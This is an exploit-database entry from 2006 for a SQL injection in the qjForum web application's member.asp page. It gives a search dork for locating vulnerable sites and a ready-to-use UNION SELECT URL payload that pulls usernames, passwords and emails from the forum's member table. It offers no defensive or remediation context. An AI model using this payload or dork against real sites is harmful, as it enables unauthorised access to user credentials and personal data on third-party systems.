qjForum (member.asp) SQL Injection Vulnerability

2006-05-26T00:00:00
ID 1337DAY-ID-450
Type zdt
Reporter ajann
Modified 2006-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
qjForum (member.asp) SQL Injection Vulnerability
================================================



# Title  :   qjForum(member.asp) SQL Injection Vulnerability
# Author :   ajann
# greetz :   Nukedx,TheHacker
# Dork   :   "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member



#  0day.today [2018-03-01]  #